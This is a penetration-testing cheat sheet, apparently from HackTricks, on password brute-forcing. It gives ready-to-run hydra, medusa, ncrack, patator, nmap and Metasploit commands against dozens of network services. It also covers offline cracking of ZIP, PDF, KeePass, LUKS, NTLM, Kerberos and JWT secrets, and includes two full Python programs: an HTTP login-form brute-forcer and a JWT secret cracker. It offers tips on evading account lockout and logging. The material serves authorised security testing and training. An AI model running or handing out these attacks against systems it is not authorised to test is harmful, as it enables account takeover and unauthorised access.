Brute Force - CheatSheet
If you want to know about my latest modifications/additions or you have any suggestion for HackTricks or PEASS, join the telegram group, or follow me on Twitter @carlospolopm. If you want to share some tricks with the community you can also submit pull requests to https://github.com/carlospolop/hacktricks that will be reflected in this book and don't forget to give a star on github to motivate me to continue developing this book.

Default Credentials

Search Google for the default credentials of the technology in use, or try these links:

Create your own Dictionaries

Find as much information about the target as you can and generate a custom dictionary. Tools that may help:

Crunch

```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt # From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

# Placeholders usable in a -t pattern:
#   @ Lower case alpha characters
#   , Upper case alpha characters
#   % Numeric characters
#   ^ Special characters including space
# With -t the min and max lengths must both equal the pattern length (7 here)
crunch 7 7 -t ,@@^^%%
```

Cewl

```bash
cewl example.com -m 5 -w words.txt # Spider the site and keep words of at least 5 characters
```

CUPP

Generate passwords based on your knowledge of the victim (names, dates...)

```bash
python3 cupp.py -h # -i starts the interactive questionnaire about the victim
```

pydictor

Wordlists

Services

Ordered alphabetically by service name.

AFP

```bash
nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run
```

AJP

```bash
nmap --script ajp-brute -p 8009 <IP>
```

Cassandra

```bash
nmap --script cassandra-brute -p 9160 <IP>
```

CouchDB

```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```

Docker Registry

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
```

Elasticsearch

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
```

FTP

```bash
hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
```

HTTP Generic Brute

WFuzz

HTTP Basic Auth

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for httpS
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
```

HTTP - Post Form

```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for httpS
```

For HTTPS change "http-post-form" to "https-post-form". The last field of the module string is the failure string: hydra reports a valid login for any response that does not contain it, so choose a string that appears only on failed attempts or you will get false positives.
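To make the failure-string logic concrete, here is an added example (not hydra's code and not from the original page) that does what the http-post-form module does: submit the form for each guess and treat the attempt as a hit only when the failure marker is absent from the response. So that it runs offline it also starts a tiny stand-in login form on 127.0.0.1 with constructed credentials; the form field names, the marker text and the valid password are assumptions for the example.

```python
"""HTTP POST-form password guessing with failure-string matching (added example)."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

FAIL_MARKER = "Login name or password is incorrect"   # same marker as the hydra line above
VALID_CREDS = {"admin": "Summer2023!"}                 # constructed target credentials


class LoginHandler(BaseHTTPRequestHandler):
    """Minimal stand-in for /path/index.php that reads name= and password=."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("name", [""])[0]
        password = form.get("password", [""])[0]
        if VALID_CREDS.get(user) == password:
            body = "<h1>Welcome back, %s</h1>" % user
        else:
            body = "<p>%s</p>" % FAIL_MARKER
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body.encode())

    def log_message(self, *args):   # keep the stand-in server quiet
        pass


def start_server():
    """Bind a free localhost port and serve in a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# Opener without proxy handling so a proxy in the environment cannot swallow localhost requests.
_OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def try_login(url, user, password, fail_marker=FAIL_MARKER):
    """POST one guess; success means the failure marker is absent from the body."""
    data = urllib.parse.urlencode(
        {"name": user, "password": password, "enter": "Sign in"}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with _OPENER.open(req, timeout=5) as resp:
        return fail_marker not in resp.read().decode(errors="replace")


def brute_force(url, users, passwords, fail_marker=FAIL_MARKER):
    """Try every pair; return (user, password) of the first hit, else None.

    Passwords are the outer loop so attempts are spread across accounts, which
    is gentler on per-account lockout counters than exhausting one user first.
    """
    for password in passwords:
        for user in users:
            if try_login(url, user, password, fail_marker):
                return user, password
    return None


if __name__ == "__main__":
    server = start_server()
    target = "http://127.0.0.1:%d/path/index.php" % server.server_port
    print("found:", brute_force(target, ["admin", "bob"], ["password", "admin", "Summer2023!"]))
    server.shutdown()
```

The same false-positive caveat applies here as with hydra: if the marker is mistyped, every guess "succeeds", so verify the first hit manually before trusting it.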

HTTP - CMS -- (W)ordpress, (J)oomla, (D)rupal or (M)oodle

```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com # -u/-p take a single value or a file
```

IMAP

```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
```

IRC

```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
```

ISCSI

```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
```

JWT

```bash
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John (convert the token first with jwt2john.py from jwtcrack, see the local JWT section below)
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py <JWT token> -C -d wordlists.txt # -C crack mode, -d dictionary

#https://github.com/brendan-rius/c-jwt-cracker (pure brute force: alphabet and max length, no wordlist)
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker (alphabet and max length)
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuvwxyz" 6
```

LDAP

```bash
nmap --script ldap-brute -p 389 <IP>
```

Mongo

```bash
nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
```

MySQL

```bash
hydra -L usernames.txt -P pass.txt <IP> mysql
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
```

OracleSQL

```bash
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this module wraps nmap and sometimes fails for no obvious reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#nmap sometimes fails for no obvious reason when running this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
```

To use oracle_login with patator you need to install the Oracle client bindings:

```bash
pip3 install cx_Oracle --upgrade
```

Offline OracleSQL hash brute force (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2 and 11.2.0.3): the oracle-brute-stealth script starts an authentication as a valid user, records the session key and salt the server returns and disconnects before a failed login is recorded, so the captured value can be cracked offline without locking the account:

```bash
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
```

POP

```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
```

PostgreSQL

```bash
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres
ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
```

PPTP

You can download the .deb package to install from https://http.kali.org/pool/main/t/thc-pptp-bruter/

```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter -u <Username> <IP>
```

RDP

```bash
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
```

Redis

```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra -P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
```

Rexec

```bash
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
```

Rlogin

```bash
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
```

Rsh

```bash
hydra -L <Username_list> rsh://<Victim_IP> -v -V
```

Rsync

```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
```

RTSP

```bash
hydra -l root -P passwords.txt <IP> rtsp
```

SNMP

```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```

SMB

```bash
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
```

SMTP

```bash
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V # -S enables SSL/TLS; 587 is the submission port
```

SOCKS

```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwdb.timelimit=30m -p 1080 <IP>
```

SQL Server

```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could lock accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can lock accounts. If you have a domain, set it and use USE_WINDOWS_AUTHENT
```

SSH

```bash
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
```

Telnet

```bash
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
```

VNC

```bash
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt -s <PORT> <IP> vnc #Classic VNC auth is password-only, the password list is what matters
medusa -h <IP> -u root -P /root/Desktop/pass.txt -M vnc
ncrack -V --user root -P /root/Desktop/pass.txt vnc://<IP>:<PORT>
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt -t 1 -x retry:fgrep!='Authentication failure' --max-retries 0 -x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script vnc-brute --script-args passdb=/var/passwords.txt -p 5900 <IP>
```

Winrm

```bash
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
```

Local

Online cracking databases

Check these before trying to brute-force a hash: common hashes are often already present in public lookup databases.

ZIP

```bash
#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip # -D dictionary mode, -u unzip to verify each hit
```

```bash
zip2john file.zip > zip.john
john zip.john
```

```bash
# Example hash produced by zip2john (WinZip AES, hashcat mode 13600):
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -a 3 -i .\hashzip.txt ?a?a?a?a?a?a?a?a #Incremental mask attack; -i only works with -a 3 and grows the mask up to 8 characters
```

7z

```bash
# 7za reads a single password per run, so loop over the wordlist (stdin redirected so 7za never prompts)
while read -r p; do 7za t -p"$p" backup.7z </dev/null >/dev/null 2>&1 && echo "Password: $p" && break; done < /usr/share/wordlists/rockyou.txt
```

```bash
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
john --wordlist=/usr/share/wordlists/rockyou.txt 7zhash.john
```

PDF

```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john did not work well: john could not recognise the hash type
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
```

JWT

```bash
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali's John build
```
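What all of the JWT tools in this section and in the online JWT section above have in common is one offline check: an HS256 token is header.payload.HMAC-SHA256(secret, header.payload), and everything except the secret is in the token itself, so each candidate secret is verified by recomputing the MAC. The added example below (not crackjwt, jwt_tool or jwt-cracker code, and not from the original page) implements that check, refuses tokens whose alg is not HS256 so you do not waste time on RSA-signed ones, and includes a signer so it can be tested on a token it builds itself; the payload and candidate secrets are constructed for the example.

```python
"""Offline HS256 JWT secret recovery (added example, not from any of the tools listed)."""
import base64
import hashlib
import hmac
import json


def b64url_decode(segment):
    """base64url without padding, as JWTs use it."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def make_token(payload, secret, header=None):
    """Sign a payload with HS256 (used here to build test tokens)."""
    header = header or {"typ": "JWT", "alg": "HS256"}
    segs = [b64url_encode(json.dumps(part, separators=(",", ":")).encode())
            for part in (header, payload)]
    signing_input = ".".join(segs).encode()
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return ".".join(segs + [b64url_encode(sig)])


def crack_hs256(token, candidates):
    """Return the first candidate secret that reproduces the signature, else None."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        # RS256/ES256 tokens cannot be cracked this way; "none" is a different attack
        raise ValueError("not an HS256 token: alg=%r" % header.get("alg"))
    signing_input = (header_b64 + "." + payload_b64).encode()
    target = b64url_decode(sig_b64)
    for secret in candidates:
        mac = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return secret
    return None


def crack_from_wordlist(token, path):
    """Stream a wordlist such as rockyou.txt through crack_hs256 (one secret per line)."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        return crack_hs256(token, (line.rstrip("\r\n") for line in fh))


if __name__ == "__main__":
    # Constructed example: a token the example signs itself with a weak secret.
    weak = make_token({"username": "admin", "role": "admin"}, "Sn1f")
    print("recovered secret:", crack_hs256(weak, ["password", "secret", "Sn1f"]))
```

Once the secret is known, make_token lets you re-sign a modified payload (for instance a different role claim), which is the usual follow-up when a JWT secret is cracked.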

NTLM cracking

```bash
# Format: USERNAME:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```

Keepass

```bash
sudo apt-get install -y kpcli #kpcli is a CLI client for KeePass databases; keepass2john itself ships with John the Ripper (jumbo)
keepass2john file.kdbx > hash #The database is protected only by a password
keepass2john -k <file-password> file.kdbx > hash #The database also requires a key file
#A KeePass database can use a password and/or a key file as credentials; if it uses both you must provide the key file to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

Kerberoasting

```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```

LUKS image

Method 1

```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img myluksopen
ls /dev/mapper/ #You should find the image myluksopen here
mount /dev/mapper/myluksopen /mnt
```

Method 2

```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096 (sectors)
dd if=backup.img of=lukshash bs=512 count=4097 #Payload offset +1: the header plus the first payload sector, which hashcat needs to verify a candidate key
hashcat -m 14600 -a 0 lukshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img myluksopen
ls /dev/mapper/ #You should find the image myluksopen here
mount /dev/mapper/myluksopen /mnt
```

Mysql

```bash
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```

PGP/GPG Private key

```bash
gpg2john private_pgp.key #This will generate the hash, save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```

Tools

Hash-identifier

```bash
hash-identifier
> <HASH>
```

John mutation

Read /etc/john/john.conf and configure the rule sets there

```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```

Hashcat

```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
Cracking Linux Hashes - /etc/shadow file

```
 500 | md5crypt $1$, MD5(Unix)       | Operating-Systems
3200 | bcrypt $2*$, Blowfish(Unix)   | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```

Cracking Windows Hashes

```
3000 | LM   | Operating-Systems
1000 | NTLM | Operating-Systems
```

Cracking Common Application Hashes

```
  900 | MD4      | Raw Hash
    0 | MD5      | Raw Hash
 5100 | Half MD5 | Raw Hash
  100 | SHA1     | Raw Hash
10800 | SHA-384  | Raw Hash
 1400 | SHA-256  | Raw Hash
 1700 | SHA-512  | Raw Hash
```